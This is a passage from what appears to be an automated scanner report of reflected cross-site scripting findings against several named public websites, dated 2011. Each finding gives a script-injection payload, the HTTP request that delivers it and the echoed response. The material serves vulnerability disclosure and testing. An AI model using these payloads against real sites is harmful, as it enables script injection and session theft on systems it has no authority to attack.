The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58db4"%3b2273c575d86 was submitted in the REST URL parameter 1. This input was echoed as 58db4";2273c575d86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status58db4"%3b2273c575d86 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodandwine.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 3839
Connection: Keep-Alive
Cache-Control: max-age=7200,public
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 11:55:58 GMT
Server: Apache/2.2.3 (Red Hat)
Status: 404
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11

<html xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>Page Not Found | Food & Wine</title>
<meta content='text/html; charset=iso-8859-1' http-equiv='Content
...[SNIP]...
<script type='text/javascript'>
var s_account = "timefoodandwine";
var search_kw = "";
var channel = "server-status58db4";2273c575d86";
var sub_channel = "";
var titleNoBrand = document.title;
titleNoBrand = titleNoBrand.slice(0,titleNoBrand.indexOf(' |'));
function fw_linktracker(linkname)
{
var titleNoChef = document.title;
titleN
...[SNIP]...

2.23. http://www.inc.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6779"><script>alert(1)</script>65d93b08fbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statuse6779"><script>alert(1)</script>65d93b08fbb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:41:55 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/server-statuse6779"><script>alert(1)</script>65d93b08fbb">
...[SNIP]...

2.24. http://www.inc.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ce9"><script>alert(1)</script>cc34791a254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?34ce9"><script>alert(1)</script>cc34791a254=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:41:16 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<a href="http://www.inc.com/logout?ret=http://www.inc.com/server-status?34ce9"><script>alert(1)</script>cc34791a254=1" rel="nofollow">
...[SNIP]...

2.25. http://www.kaboose.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 883fe</script><script>alert(1)</script>8e095b000b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status883fe</script><script>alert(1)</script>8e095b000b2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:34:13 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 11:38:13 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/server-status883fe</script><script>alert(1)</script>8e095b000b2");
</script>
...[SNIP]...

2.26. http://www.kaboose.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 655aa</script><script>alert(1)</script>b38f926dd67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?655aa</script><script>alert(1)</script>b38f926dd67=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:33:57 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 11:37:57 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/server-status?655aa</script><script>alert(1)</script>b38f926dd67=1");
</script>
...[SNIP]...

2.27. http://www.manta.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e61d"><script>alert(1)</script>6cf64a7c5f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.28. http://www.manta.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f68f<script>alert(1)</script>2655fa9041f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.29. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf19d<script>alert(1)</script>223df9c9a1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.30. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a481e"><script>alert(1)</script>56fd9a4771c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.31. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d9e7<script>alert(1)</script>e54763e1d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.32. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b442c"><script>alert(1)</script>236b91d1e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.33. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c303<script>alert(1)</script>0fc6d39308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.34. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /coms2/page_about_manta_contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3312a"><script>alert(1)</script>16834424f5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.35. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f79<script>alert(1)</script>398c3c5f236 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.36. http://www.manta.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17737"><script>alert(1)</script>b035543d8ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.37. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6996<script>alert(1)</script>b2a19b0fbd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.38. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec1a"><script>alert(1)</script>9ad62a2019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.39. http://www.manta.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec5a8"><script>alert(1)</script>bb89e044910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.40. http://www.manta.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2011<script>alert(1)</script>accfc3b90aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.41. http://www.mp3raid.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d5a"><script>alert(1)</script>5bc6dc87344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status82d5a"><script>alert(1)</script>5bc6dc87344 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:58:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5946
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/server-status82d5a"><script>alert(1)</script>5bc6dc87344', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

2.42. http://www.mp3raid.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e448<script>alert(1)</script>022d3f904ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8e448<script>alert(1)</script>022d3f904ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:58:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /server-status8e448<script>alert(1)</script>022d3f904ba not found!</h1>
...[SNIP]...

2.43. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78a93<script>alert(1)</script>a2ff6b3677d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?78a93<script>alert(1)</script>a2ff6b3677d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:58:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5949
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /server-status?78a93<script>alert(1)</script>a2ff6b3677d=1 not found!</h1>
...[SNIP]...

2.44. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1c2"><script>alert(1)</script>c7547c9425e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?8a1c2"><script>alert(1)</script>c7547c9425e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:58:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5955
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/server-status?8a1c2"><script>alert(1)</script>c7547c9425e=1', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

2.45. http://www.mycricket.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4419</script><script>alert(1)</script>dfe86b4c3ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statuse4419</script><script>alert(1)</script>dfe86b4c3ac HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:35:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=d20597487e2b82e4a6c3b87f18ca7bfd; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
e="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/serverstatuse4419</script><script>alert(1)</script>dfe86b4c3ac"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...

2.46. http://www.mylifetime.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0ec1'%3bc6711997946 was submitted in the REST URL parameter 1. This input was echoed as d0ec1';c6711997946 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

2.47. http://www.mylifetime.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e89"><a>10ecc96fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

2.48. http://www.schoolfusion.us/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.schoolfusion.us
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d661<script>alert(1)</script>a9d3e1ed519 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status1d661<script>alert(1)</script>a9d3e1ed519 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schoolfusion.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:49:47 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 293

<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/server-status1d661<script>alert(1)</script>a9d3e1ed519</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http:
...[SNIP]...

2.49. http://www.stltoday.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.stltoday.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 287fc-->40f7fe6d0fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status?287fc-->40f7fe6d0fd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stltoday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 3051880
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 02 Apr 2011 11:34:51 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.7
X-TNCMS-Render-Time: 0.0847
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: stltoday.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 43541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<base href="htt
...[SNIP]...
<!-- debug:

   cms.system.page_url: /server-status/?287fc-->40f7fe6d0fd=1
-->
...[SNIP]...

2.50. http://www.supercheats.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a29f"%3balert(1)//3200f220976 was submitted in the REST URL parameter 1. This input was echoed as 5a29f";alert(1)//3200f220976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status5a29f"%3balert(1)//3200f220976 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:40:44 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/server-status5a29f";alert(1)//3200f220976",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...

2.51. http://www.thehollywoodgossip.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe50"><script>alert(1)</script>a72918afc84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusafe50"><script>alert(1)</script>a72918afc84 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:34:42 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 12:34:42 GMT
Set-Cookie: mut=173.193.214.243.1301744082468836; path=/; expires=Sat, 30-Apr-11 11:34:42 GMT; domain=.thehollywoodgossip.com
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d4sqhge14sd2c4q04bf128ii46; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
